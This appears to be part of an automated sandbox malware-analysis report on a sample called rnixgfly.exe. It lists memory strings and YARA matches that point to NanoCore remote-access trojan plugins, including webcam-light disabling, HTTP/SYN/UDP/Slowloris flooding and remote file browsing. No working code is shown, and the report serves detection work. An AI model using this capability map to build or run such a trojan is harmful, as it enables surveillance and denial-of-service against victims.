    Source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
    Source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
    Source: rnixgfly.exe, 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
    Source: rnixgfly.exe, 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.503941570.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
    Source: rnixgfly.exe, 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Source: rnixgfly.exe, 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
    Source: rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
    Source: rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
    Source: rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
    Source: rnixgfly.exe, 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
